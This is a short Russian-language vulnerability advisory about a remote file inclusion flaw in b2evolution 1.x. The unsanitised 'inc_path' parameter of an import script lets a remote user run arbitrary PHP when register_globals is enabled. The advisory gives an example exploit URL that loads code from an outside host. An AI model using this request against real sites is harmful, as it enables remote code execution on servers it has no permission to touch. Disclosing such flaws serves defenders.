Программа: b2evolution 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «inc_path» сценарием inc/CONTROL/imports/import-mt.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опции «register_globals» в конфигурационном файле PHP. 

Пример: 

http://<victim>/<b2epath>/inc/CONTROL/import/import-mt.php?basepath= \foo&inc_path=https://tiifp.org/tarkus/PoC/



Оставить мнение